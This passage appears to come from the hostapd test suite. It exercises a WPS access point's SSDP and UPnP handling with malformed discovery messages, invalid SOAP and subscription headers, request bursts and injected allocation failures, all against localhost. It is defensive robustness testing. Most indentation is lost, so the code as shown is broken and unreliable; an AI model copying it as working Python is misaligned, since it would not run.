'st: urn:schemas-wifialliance-org:device:WFADevice:1\t\t',
'', ''])
ssdp_send(msg)
ssdp_send_msearch("ssdp:all")
ssdp_send_msearch("upnp:rootdevice")
ssdp_send_msearch("uuid:" + ap_uuid)
ssdp_send_msearch("urn:schemas-wifialliance-org:service:WFAWLANConfig:1")
ssdp_send_msearch("urn:schemas-wifialliance-org:device:WFADevice:1")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST:\t239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 130',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
ssdp_send(msg, no_recv=True)
def test_ap_wps_ssdp_invalid_msearch(dev, apdev):
"""WPS AP and invalid SSDP M-SEARCH messages"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
socket.setdefaulttimeout(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(("127.0.0.1", 0))
logger.debug("Missing MX")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Negative MX")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX: -1',
'MAN: "ssdp:discover"',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Invalid MX")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX; 1',
'MAN: "ssdp:discover"',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Missing MAN")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Invalid MAN")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX: 1',
'MAN: foo',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX: 1',
'MAN; "ssdp:discover"',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Missing HOST")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Missing ST")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Mismatching ST")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: uuid:16d5f8a9-4ee4-4f5e-81f9-cc6e2f47f42d',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: foo:bar',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: foobar',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Invalid ST")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST; urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Invalid M-SEARCH")
msg = '\r\n'.join([
'M+SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
msg = '\r\n'.join([
'M-SEARCH-* HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Invalid message format")
sock.sendto(b"NOTIFY * HTTP/1.1", ("239.255.255.250", 1900))
msg = '\r'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
try:
        r = sock.recv(1000).decode()
        raise Exception("Unexpected M-SEARCH response: " + r)
except socket.timeout:
pass
logger.debug("Valid M-SEARCH")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
try:
        sock.recv(1000)
except socket.timeout:
raise Exception("No SSDP response")
def test_ap_wps_ssdp_burst(dev, apdev):
"""WPS AP and SSDP burst"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
socket.setdefaulttimeout(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(("127.0.0.1", 0))
for i in range(0, 25):
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
resp = 0
while True:
try:
r = sock.recv(1000).decode()
if not r.startswith("HTTP/1.1 200 OK\r\n"):
raise Exception("Unexpected message: " + r)
resp += 1
except socket.timeout:
break
if resp < 20:
raise Exception("Too few SSDP responses")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(("127.0.0.1", 0))
for i in range(0, 25):
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
while True:
try:
r = sock.recv(1000).decode()
if ap_uuid in r:
break
except socket.timeout:
raise Exception("No SSDP response")
def ssdp_get_location(uuid):
res = ssdp_send_msearch("uuid:" + uuid)
location = None
for l in res.splitlines():
if l.lower().startswith("location:"):
location = l.split(':', 1)[1].strip()
break
if location is None:
raise Exception("No UPnP location found")
return location
def upnp_get_urls(location):
if sys.version_info[0] > 2:
conn = urlopen(location)
else:
conn = urlopen(location, proxies={})
tree = ET.parse(conn)
root = tree.getroot()
urn = '{urn:schemas-upnp-org:device-1-0}'
service = root.find("./" + urn + "device/" + urn + "serviceList/" + urn + "service")
res = {}
res['scpd_url'] = urljoin(location, service.find(urn + 'SCPDURL').text)
res['control_url'] = urljoin(location,
service.find(urn + 'controlURL').text)
res['event_sub_url'] = urljoin(location,
service.find(urn + 'eventSubURL').text)
return res
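# upnp_get_urls() assumes the device description follows the standard UPnP
# device schema; a minimal sketch of the expected structure:
#
#   <root xmlns="urn:schemas-upnp-org:device-1-0">
#     <device>
#       <serviceList>
#         <service>
#           <SCPDURL>...</SCPDURL>
#           <controlURL>...</controlURL>
#           <eventSubURL>...</eventSubURL>
#         </service>
#       </serviceList>
#     </device>
#   </root>
#
# The three URLs are resolved relative to the LOCATION URL of the
# description document itself.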
def upnp_soap_action(conn, path, action, include_soap_action=True,
soap_action_override=None, newmsg=None, neweventtype=None,
neweventmac=None):
soapns = 'http://schemas.xmlsoap.org/soap/envelope/'
wpsns = 'urn:schemas-wifialliance-org:service:WFAWLANConfig:1'
ET.register_namespace('soapenv', soapns)
ET.register_namespace('wfa', wpsns)
attrib = {}
attrib['{%s}encodingStyle' % soapns] = 'http://schemas.xmlsoap.org/soap/encoding/'
root = ET.Element("{%s}Envelope" % soapns, attrib=attrib)
body = ET.SubElement(root, "{%s}Body" % soapns)
act = ET.SubElement(body, "{%s}%s" % (wpsns, action))
if newmsg:
msg = ET.SubElement(act, "NewMessage")
msg.text = base64.b64encode(newmsg.encode()).decode()
if neweventtype:
msg = ET.SubElement(act, "NewWLANEventType")
msg.text = neweventtype
if neweventmac:
msg = ET.SubElement(act, "NewWLANEventMAC")
msg.text = neweventmac
headers = { "Content-type": 'text/xml; charset="utf-8"' }
if include_soap_action:
headers["SOAPAction"] = '"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#%s"' % action
elif soap_action_override:
headers["SOAPAction"] = soap_action_override
decl = b'<?xml version=\'1.0\' encoding=\'utf8\'?>\n'
conn.request("POST", path, decl + ET.tostring(root), headers)
return conn.getresponse()
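# upnp_soap_action() serializes a request body along these lines (sketch;
# NewMessage/NewWLANEventType/NewWLANEventMAC appear only when the
# corresponding argument is given):
#
#   <soapenv:Envelope soapenv:encodingStyle="...soap/encoding/">
#     <soapenv:Body>
#       <wfa:ACTION>
#         <NewMessage>base64(newmsg)</NewMessage>
#       </wfa:ACTION>
#     </soapenv:Body>
#   </soapenv:Envelope>
#
# and, unless suppressed, sets the SOAPAction header to
# "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#ACTION".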
def test_ap_wps_upnp(dev, apdev):
"""WPS AP and UPnP operations"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
urls = upnp_get_urls(location)
if sys.version_info[0] > 2:
conn = urlopen(urls['scpd_url'])
else:
conn = urlopen(urls['scpd_url'], proxies={})
scpd = conn.read()
if sys.version_info[0] > 2:
try:
conn = urlopen(urljoin(location, "unknown.html"))
raise Exception("Unexpected HTTP response to GET unknown URL")
except HTTPError as e:
if e.code != 404:
raise Exception("Unexpected HTTP response to GET unknown URL")
else:
conn = urlopen(urljoin(location, "unknown.html"), proxies={})
if conn.getcode() != 404:
raise Exception("Unexpected HTTP response to GET unknown URL")
url = urlparse(location)
conn = HTTPConnection(url.netloc)
#conn.set_debuglevel(1)
headers = { "Content-type": 'text/xml; charset="utf-8"',
"SOAPAction": '"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#GetDeviceInfo"' }
conn.request("POST", "hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn.request("UNKNOWN", "hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "Content-type": 'text/xml; charset="utf-8"',
"SOAPAction": '"urn:some-unknown-action#GetDeviceInfo"' }
ctrlurl = urlparse(urls['control_url'])
conn.request("POST", ctrlurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 401:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("GetDeviceInfo without SOAPAction header")
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo",
include_soap_action=False)
if resp.status != 401:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("GetDeviceInfo with invalid SOAPAction header")
for act in [ "foo",
"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#GetDeviceInfo",
'"urn:schemas-wifialliance-org:service:WFAWLANConfig:1"',
'"urn:schemas-wifialliance-org:service:WFAWLANConfig:123#GetDevice']:
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo",
include_soap_action=False,
soap_action_override=act)
if resp.status != 401:
raise Exception("Unexpected HTTP response: %d" % resp.status)
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
    devinfo = resp.read().decode()
    if "NewDeviceInfo" not in devinfo:
raise Exception("Unexpected GetDeviceInfo response")
logger.debug("PutMessage without required parameters")
resp = upnp_soap_action(conn, ctrlurl.path, "PutMessage")
if resp.status != 600:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("PutWLANResponse without required parameters")
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse")
if resp.status != 600:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("SetSelectedRegistrar from unregistered ER")
resp = upnp_soap_action(conn, ctrlurl.path, "SetSelectedRegistrar")
if resp.status != 501:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Unknown action")
resp = upnp_soap_action(conn, ctrlurl.path, "Unknown")
if resp.status != 401:
raise Exception("Unexpected HTTP response: %d" % resp.status)
def test_ap_wps_upnp_subscribe(dev, apdev):
"""WPS AP and UPnP event subscription"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
urls = upnp_get_urls(location)
eventurl = urlparse(urls['event_sub_url'])
url = urlparse(location)
conn = HTTPConnection(url.netloc)
#conn.set_debuglevel(1)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", "hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:foobar",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Valid subscription")
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
logger.debug("Invalid re-subscription")
headers = { "NT": "upnp:event",
"sid": "123456734567854",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid re-subscription")
headers = { "NT": "upnp:event",
"sid": "uuid:123456734567854",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid re-subscription")
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"sid": sid,
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("SID mismatch in re-subscription")
headers = { "NT": "upnp:event",
"sid": "uuid:4c2bca79-1ff4-4e43-85d4-952a2b8a51fb",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Valid re-subscription")
headers = { "NT": "upnp:event",
"sid": sid,
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid2 = resp.getheader("sid")
logger.debug("Subscription SID " + sid2)
if sid != sid2:
raise Exception("Unexpected SID change")
logger.debug("Valid re-subscription")
headers = { "NT": "upnp:event",
"sid": "uuid: \t \t" + sid.split(':')[1],
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid unsubscription")
headers = { "sid": sid }
conn.request("UNSUBSCRIBE", "/hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "foo": "bar" }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Valid unsubscription")
headers = { "sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Unsubscription for not existing SID")
headers = { "sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 412:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid unsubscription")
headers = { "sid": " \t \tfoo" }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid unsubscription")
headers = { "sid": "uuid:\t \tfoo" }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Invalid unsubscription")
headers = { "NT": "upnp:event",
"sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 400:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("Valid subscription with multiple callbacks")
headers = { "callback": '<http://127.0.0.1:12345/event> <http://127.0.0.1:12345/event>\t<http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event><http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
# Force subscription to be deleted due to errors
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
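    # alloc_fail() arms the hostapd allocation-failure test hook so that the
    # matching allocation in the named function fails; each proxied WPS
    # event then hits the error path until the subscription gets dropped.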
with alloc_fail(hapd, 1, "event_build_message"):
for i in range(10):
dev[1].dump_monitor()
dev[2].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[2].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
dev[2].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[2].request("WPS_CANCEL")
if i % 4 == 1:
time.sleep(1)
else:
time.sleep(0.1)
time.sleep(0.2)
headers = { "sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "", headers)
resp = conn.getresponse()
if resp.status != 200 and resp.status != 412:
raise Exception("Unexpected HTTP response for UNSUBSCRIBE: %d" % resp.status)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
with alloc_fail(hapd, 1, "http_client_addr;event_send_start"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response for SUBSCRIBE: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
headers = { "sid": sid }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response for UNSUBSCRIBE: %d" % resp.status)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
with alloc_fail(hapd, 1, "=event_add"):
for i in range(2):
dev[1].dump_monitor()
dev[2].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[2].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
dev[2].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[2].request("WPS_CANCEL")
if i == 0:
time.sleep(1)
else:
time.sleep(0.1)
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "wpabuf_dup;event_add"):
dev[1].dump_monitor()
dev[2].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[2].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
dev[2].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[2].request("WPS_CANCEL")
time.sleep(0.1)
with fail_test(hapd, 1, "os_get_random;uuid_make;subscription_start"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "=subscription_start"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "callback": '',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "callback": ' <',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
with alloc_fail(hapd, 1, "wpabuf_alloc;subscription_first_event"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "event_add;subscription_first_event"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "subscr_addr_add_url"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 2, "subscr_addr_add_url"):
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
for i in range(6):
headers = { "callback": '<http://127.0.0.1:%d/event>' % (12345 + i),
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "=upnp_wps_device_send_wlan_event"):
dev[1].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
time.sleep(0.1)
with alloc_fail(hapd, 1, "wpabuf_alloc;upnp_wps_device_send_event"):
dev[1].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
time.sleep(0.1)
with alloc_fail(hapd, 1,
"base64_gen_encode;?base64_encode;upnp_wps_device_send_wlan_event"):
dev[1].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
time.sleep(0.1)
hapd.disable()
with alloc_fail(hapd, 1, "get_netif_info"):
if "FAIL" not in hapd.request("ENABLE"):
raise Exception("ENABLE succeeded during OOM")
def test_ap_wps_upnp_subscribe_events(dev, apdev):
"""WPS AP and UPnP event subscription and many events"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
urls = upnp_get_urls(location)
eventurl = urlparse(urls['event_sub_url'])
class WPSERHTTPServer(StreamRequestHandler):
def handle(self):
data = self.rfile.readline().strip()
logger.debug(data)
self.wfile.write(gen_wps_event())
server = MyTCPServer(("127.0.0.1", 12345), WPSERHTTPServer)
server.timeout = 1
url = urlparse(location)
conn = HTTPConnection(url.netloc)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
# Fetch the first event message
server.handle_request()
# Force subscription event queue to reach the maximum length by generating
# new proxied events without the ER fetching any of the pending events.
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
for i in range(16):
dev[1].dump_monitor()
dev[2].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[2].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
dev[1].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[1].request("WPS_CANCEL")
dev[2].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
dev[2].request("WPS_CANCEL")
if i % 4 == 1:
time.sleep(1)
else:
time.sleep(0.1)
hapd.request("WPS_PIN any 12345670")
dev[1].dump_monitor()
dev[1].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
ev = dev[1].wait_event(["WPS-SUCCESS"], timeout=10)
if ev is None:
raise Exception("WPS success not reported")
    # Close the WPS ER HTTP server without fetching all the pending events.
    # This exercises the hostapd code path that clears the subscription and
    # the remaining event queue when the interface is deinitialized.
server.handle_request()
server.server_close()
dev[1].wait_connected()
def test_ap_wps_upnp_http_proto(dev, apdev):
"""WPS AP and UPnP/HTTP protocol testing"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
url = urlparse(location)
conn = HTTPConnection(url.netloc, timeout=0.2)
#conn.set_debuglevel(1)
conn.request("HEAD", "hello")
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected response to HEAD: " + str(resp.status))
conn.close()
